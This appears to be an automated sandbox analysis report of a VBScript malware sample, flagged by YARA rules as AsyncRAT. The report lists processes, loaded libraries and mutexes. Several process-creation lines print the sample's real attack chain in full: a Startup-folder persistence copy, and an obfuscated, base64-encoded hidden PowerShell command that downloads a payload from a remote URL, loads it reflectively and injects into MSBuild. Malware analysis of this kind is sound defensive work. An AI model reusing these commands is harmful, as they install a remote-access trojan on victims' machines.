            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_02D948B012_2_02D948B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_02D94EA812_2_02D94EA8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_02D9FAF812_2_02D9FAF8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_02D9195812_2_02D91958
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_02D91FE812_2_02D91FE8
            Source: C:\Users\user\AppData\Local\XClient.exeCode function: 13_2_0108278813_2_01082788
            Source: C:\Users\user\AppData\Local\XClient.exeCode function: 13_2_01085A4113_2_01085A41
            Source: C:\Users\user\AppData\Local\XClient.exeCode function: 13_2_01081E2F13_2_01081E2F
            Source: C:\Users\user\AppData\Local\XClient.exeCode function: 15_2_0138278815_2_01382788
            Source: C:\Users\user\AppData\Local\XClient.exeCode function: 15_2_01385A4115_2_01385A41
            Source: C:\Users\user\AppData\Local\XClient.exeCode function: 15_2_01381E2F15_2_01381E2F
            Source: k4STQvJ6rV.vbsInitial sample: Strings found which are bigger than 50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2396 -s 1916
            Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 9.2.powershell.exe.1ffe69692d0.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 9.2.powershell.exe.1ffe69692d0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0000000C.00000002.2579124201.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000009.00000002.1617406175.000001FFE6961000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: Process Memory Space: powershell.exe PID: 7208, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 7600, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: XClient.exe.12.dr, TaskParameter.csTask registration methods: 'CreateNewTaskItemFrom'
            Source: XClient.exe.12.dr, OutOfProcTaskHostNode.csTask registration methods: 'RegisterTaskObject', 'UnregisterPacketHandler', 'RegisterPacketHandler', 'UnregisterTaskObject', 'GetRegisteredTaskObject'
            Source: XClient.exe.12.dr, TaskLoader.csTask registration methods: 'CreateTask'
            Source: XClient.exe.12.dr, RegisteredTaskObjectCacheBase.csTask registration methods: 'GetLazyCollectionForLifetime', 'RegisterTaskObject', 'DisposeObjects', 'IsCollectionEmptyOrUncreated', 'UnregisterTaskObject', 'DisposeCacheObjects', 'GetRegisteredTaskObject', 'GetCollectionForLifetime'
            Source: XClient.exe.12.dr, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent(bool)
            Source: XClient.exe.12.dr, NodeEndpointOutOfProcBase.csSecurity API names: System.IO.Pipes.PipeSecurity.AddAccessRule(System.IO.Pipes.PipeAccessRule)
            Source: XClient.exe.12.dr, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 12.2.MSBuild.exe.3ef5570.1.raw.unpack, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 12.2.MSBuild.exe.3ef5570.1.raw.unpack, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 12.2.MSBuild.exe.3ef5570.1.raw.unpack, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent(bool)
            Source: 12.2.MSBuild.exe.3ef5570.1.raw.unpack, NodeEndpointOutOfProcBase.csSecurity API names: System.IO.Pipes.PipeSecurity.AddAccessRule(System.IO.Pipes.PipeAccessRule)
            Source: 12.2.MSBuild.exe.3ef5570.1.raw.unpack, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: XClient.exe.12.dr, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: XClient.exe.12.dr, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: XClient.exe, 0000000D.00000002.1788791786.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 0000000F.00000002.1871955028.0000000001103000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Users\user\AppData\Local\<.sln
            Source: MSBuild.exe, 0000000C.00000002.2601959996.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 0000000D.00000000.1784223768.0000000000822000.00000002.00000001.01000000.00000008.sdmp, XClient.exe.12.drBinary or memory string: .configAMSBUILDDIRECTORYDELETERETRYCOUNTCMSBUILDDIRECTORYDELETRETRYTIMEOUT.sln
            Source: MSBuild.exe, 0000000C.00000002.2601959996.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 0000000D.00000000.1784223768.0000000000822000.00000002.00000001.01000000.00000008.sdmp, XClient.exe.12.drBinary or memory string: MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release
            Source: MSBuild.exe, 0000000C.00000002.2607787321.0000000006B20000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2601959996.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2579886766.00000000011B0000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 0000000D.00000000.1784223768.0000000000822000.00000002.00000001.01000000.00000008.sdmp, XClient.exe.12.drBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
            Source: XClient.exe, 0000000D.00000002.1791285517.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 0000000F.00000002.1875025504.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q#C:\Users\user\AppData\Local\*.sln
            Source: MSBuild.exe, 0000000C.00000002.2601959996.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 0000000D.00000002.1791285517.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 0000000D.00000000.1784223768.0000000000822000.00000002.00000001.01000000.00000008.sdmp, XClient.exe, 0000000F.00000002.1875025504.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, XClient.exe.12.drBinary or memory string: *.sln
            Source: MSBuild.exe, 0000000C.00000002.2601959996.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 0000000D.00000000.1784223768.0000000000822000.00000002.00000001.01000000.00000008.sdmp, XClient.exe.12.drBinary or memory string: MSBuild MyApp.csproj /t:Clean
            Source: MSBuild.exe, 0000000C.00000002.2601959996.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 0000000D.00000000.1784223768.0000000000822000.00000002.00000001.01000000.00000008.sdmp, XClient.exe.12.drBinary or memory string: /ignoreprojectextensions:.sln
            Source: MSBuild.exe, 0000000C.00000002.2601959996.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 0000000D.00000000.1784223768.0000000000822000.00000002.00000001.01000000.00000008.sdmp, XClient.exe.12.drBinary or memory string: MSBUILD : error MSB1048: Solution files cannot be debugged directly. Run MSBuild first with an environment variable MSBUILDEMITSOLUTION=1 to create a corresponding ".sln.metaproj" file. Then debug that.
            Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@20/17@4/4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\XClient.exeJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7968:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6212:120:WilError_03
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\5bNGXYqivXkuHa01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7236:120:WilError_03
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2396
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5640:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_awi0fsbb.wse.ps1Jump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\k4STQvJ6rV.vbs"
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\k4STQvJ6rV.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\k4STQvJ6rV.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.amoimoil.vbs')')
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\k4STQvJ6rV.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.amoimoil.vbs')')
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdtWHR1cicrJ2wgJysnPSBkMG1odHRwcycrJzonKycvL3Jhdy5naScrJ3RoJysndWJ1c2UnKydyY29uJysndGVuJysndC5jb20nKycvJysnTm9EZXQnKydlY3RPbi9OJysnbycrJ0RlJysndGUnKydjdCcrJ09uLycrJ3JlZicrJ3MvaGVhZHMvbWEnKydpbi9EZXRhJysnaE5vdGgtJysnVi50eHRkMCcrJ207IG1YdGInKydhc2UnKyc2NENvbnRlbnQgPSAoJysnTmV3LU9iamVjdCBTeScrJ3N0ZW0uTicrJ2V0JysnLldlJysnYkNsaWVudCkuJysnRCcrJ293bmwnKydvYWRTdHJpJysnbicrJ2cobVgnKyd0dXInKydsKTsnKycgbVh0YicrJ2luYScrJ3J5QycrJ29udGVuJysndCA9IFtTJysneXN0JysnZW0uQ29uJysndmUnKydydF06OicrJ0YnKydybycrJ20nKydCJysnYXNlNjRTJysndHJpbicrJ2cobVh0YmEnKydzJysnZTYnKyc0Q29uJysndGUnKydudCcrJyk7IG1YdGFzJysnc2UnKydtYicrJ2wnKyd5ID0nKycgW1JlZicrJ2wnKydlY3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzonKydMb2FkJysnKCcrJ21YdGJpbmFyeUNvJysnbnRlbnQpOyBbZG5saWInKycuSScrJ08uJysnSG9tZV06JysnOlZBSSgnKyc3cEswJysnLzQzVnluL2QvZWUuZXRzJysnYScrJ3AvLzpzcHR0aCcrJzdwSycrJywnKycgN3BLZGVzJysnYXQnKydpdmEnKydkbycrJzdwSycrJywnKycgJysnN3AnKydLZGVzYXRpdmFkbycrJzcnKydwSywgN3BLZGVzYXQnKydpdicrJ2FkbzdwSywgJysnN3BLJysnTVNCJysndScrJ2lsZDcnKydwSycrJywgNycrJ3BLN3BLLDdwJysnSzdwSyknKS5SRXBMYWNlKChbY2hhcl0xMDArW2NoYXJdNDgrW2NoYXJdMTA5KSxbc3RyaW5nXVtjaGFyXTM5KS5SRXBMYWNlKCdtWHQnLCckJykuUkVwTGFjZSgoW2NoYXJdNTUrW2NoYXJdMTEyK1tjaGFyXTc1KSxbc3RyaW5nXVtjaGFyXTM0KXwgJiAoICRFTnY6Q09tc3BlY1s0LDE1LDI1XS1Kb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('mXtur'+'l '+'= d0mhttps'+':'+'//raw.gi'+'th'+'ubuse'+'rcon'+'ten'+'t.com'+'/'+'NoDet'+'ectOn/N'+'o'+'De'+'te'+'ct'+'On/'+'ref'+'s/heads/ma'+'in/Deta'+'hNoth-'+'V.txtd0'+'m; mXtb'+'ase'+'64Content = ('+'New-Object Sy'+'stem.N'+'et'+'.We'+'bClient).'+'D'+'ownl'+'oadStri'+'n'+'g(mX'+'tur'+'l);'+' mXtb'+'ina'+'ryC'+'onten'+'t = [S'+'yst'+'em.Con'+'ve'+'rt]::'+'F'+'ro'+'m'+'B'+'ase64S'+'trin'+'g(mXtba'+'s'+'e6'+'4Con'+'te'+'nt'+'); mXtas'+'se'+'mb'+'l'+'y ='+' [Ref'+'l'+'ection.'+'A'+'ssembly]:'+':'+'Load'+'('+'mXtbinaryCo'+'ntent); [dnlib'+'.I'+'O.'+'Home]:'+':VAI('+'7pK0'+'/43Vyn/d/ee.ets'+'a'+'p//:sptth'+'7pK'+','+' 7pKdes'+'at'+'iva'+'do'+'7pK'+','+' '+'7p'+'Kdesativado'+'7'+'pK, 7pKdesat'+'iv'+'ado7pK, '+'7pK'+'MSB'+'u'+'ild7'+'pK'+', 7'+'pK7pK,7p'+'K7pK)').REpLace(([char]100+[char]48+[char]109),[string][char]39).REpLace('mXt','$').REpLace(([char]55+[char]112+[char]75),[string][char]34)| & ( $ENv:COmspec[4,15,25]-JoiN'')"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Local\XClient.exe "C:\Users\user\AppData\Local\XClient.exe"
            Source: C:\Users\user\AppData\Local\XClient.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\user\AppData\Local\XClient.exe "C:\Users\user\AppData\Local\XClient.exe"
            Source: C:\Users\user\AppData\Local\XClient.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2396 -s 1916
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\k4STQvJ6rV.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.amoimoil.vbs')')Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdtWHR1cicrJ2wgJysnPSBkMG1odHRwcycrJzonKycvL3Jhdy5naScrJ3RoJysndWJ1c2UnKydyY29uJysndGVuJysndC5jb20nKycvJysnTm9EZXQnKydlY3RPbi9OJysnbycrJ0RlJysndGUnKydjdCcrJ09uLycrJ3JlZicrJ3MvaGVhZHMvbWEnKydpbi9EZXRhJysnaE5vdGgtJysnVi50eHRkMCcrJ207IG1YdGInKydhc2UnKyc2NENvbnRlbnQgPSAoJysnTmV3LU9iamVjdCBTeScrJ3N0ZW0uTicrJ2V0JysnLldlJysnYkNsaWVudCkuJysnRCcrJ293bmwnKydvYWRTdHJpJysnbicrJ2cobVgnKyd0dXInKydsKTsnKycgbVh0YicrJ2luYScrJ3J5QycrJ29udGVuJysndCA9IFtTJysneXN0JysnZW0uQ29uJysndmUnKydydF06OicrJ0YnKydybycrJ20nKydCJysnYXNlNjRTJysndHJpbicrJ2cobVh0YmEnKydzJysnZTYnKyc0Q29uJysndGUnKydudCcrJyk7IG1YdGFzJysnc2UnKydtYicrJ2wnKyd5ID0nKycgW1JlZicrJ2wnKydlY3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzonKydMb2FkJysnKCcrJ21YdGJpbmFyeUNvJysnbnRlbnQpOyBbZG5saWInKycuSScrJ08uJysnSG9tZV06JysnOlZBSSgnKyc3cEswJysnLzQzVnluL2QvZWUuZXRzJysnYScrJ3AvLzpzcHR0aCcrJzdwSycrJywnKycgN3BLZGVzJysnYXQnKydpdmEnKydkbycrJzdwSycrJywnKycgJysnN3AnKydLZGVzYXRpdmFkbycrJzcnKydwSywgN3BLZGVzYXQnKydpdicrJ2FkbzdwSywgJysnN3BLJysnTVNCJysndScrJ2lsZDcnKydwSycrJywgNycrJ3BLN3BLLDdwJysnSzdwSyknKS5SRXBMYWNlKChbY2hhcl0xMDArW2NoYXJdNDgrW2NoYXJdMTA5KSxbc3RyaW5nXVtjaGFyXTM5KS5SRXBMYWNlKCdtWHQnLCckJykuUkVwTGFjZSgoW2NoYXJdNTUrW2NoYXJdMTEyK1tjaGFyXTc1KSxbc3RyaW5nXVtjaGFyXTM0KXwgJiAoICRFTnY6Q09tc3BlY1s0LDE1LDI1XS1Kb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\k4STQvJ6rV.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.amoimoil.vbs')')Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('mXtur'+'l '+'= d0mhttps'+':'+'//raw.gi'+'th'+'ubuse'+'rcon'+'ten'+'t.com'+'/'+'NoDet'+'ectOn/N'+'o'+'De'+'te'+'ct'+'On/'+'ref'+'s/heads/ma'+'in/Deta'+'hNoth-'+'V.txtd0'+'m; mXtb'+'ase'+'64Content = ('+'New-Object Sy'+'stem.N'+'et'+'.We'+'bClient).'+'D'+'ownl'+'oadStri'+'n'+'g(mX'+'tur'+'l);'+' mXtb'+'ina'+'ryC'+'onten'+'t = [S'+'yst'+'em.Con'+'ve'+'rt]::'+'F'+'ro'+'m'+'B'+'ase64S'+'trin'+'g(mXtba'+'s'+'e6'+'4Con'+'te'+'nt'+'); mXtas'+'se'+'mb'+'l'+'y ='+' [Ref'+'l'+'ection.'+'A'+'ssembly]:'+':'+'Load'+'('+'mXtbinaryCo'+'ntent); [dnlib'+'.I'+'O.'+'Home]:'+':VAI('+'7pK0'+'/43Vyn/d/ee.ets'+'a'+'p//:sptth'+'7pK'+','+' 7pKdes'+'at'+'iva'+'do'+'7pK'+','+' '+'7p'+'Kdesativado'+'7'+'pK, 7pKdesat'+'iv'+'ado7pK, '+'7pK'+'MSB'+'u'+'ild7'+'pK'+', 7'+'pK7pK,7p'+'K7pK)').REpLace(([char]100+[char]48+[char]109),[string][char]39).REpLace('mXt','$').REpLace(([char]55+[char]112+[char]75),[string][char]34)| & ( $ENv:COmspec[4,15,25]-JoiN'')"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
